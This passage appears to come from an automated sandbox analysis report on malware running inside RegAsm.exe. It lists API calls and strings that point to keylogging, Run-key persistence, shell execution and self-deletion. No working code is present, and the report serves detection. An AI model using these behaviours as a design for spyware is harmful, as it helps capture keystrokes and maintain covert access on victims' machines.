                                                                                                • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                              • String ID: [AltL]$[AltR]
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: !D@$open
                                                                                              APIs
                                                                                              • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: State
                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                              APIs
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer__onexit
                                                                                              • String ID: ,kG$0kG
                                                                                              APIs
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteOpenValue
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                              • String ID: pth_unenc
                                                                                              APIs
                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                              • String ID: pth_unenc
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                              • GetLastError.KERNEL32 ref: 00440D85
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                              • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 4100373531-0